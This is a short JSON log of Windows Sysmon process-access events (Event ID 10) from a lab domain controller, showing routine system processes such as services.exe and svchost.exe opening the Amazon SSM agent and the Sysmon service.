{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1442,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.236\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 940\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001037BE0200}\r\nTargetProcessId: 2468\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.236","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"940","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001037BE0200}","TargetProcessId":"2468","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1443,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1444,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1445,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1446,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1447,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1448,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1449,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
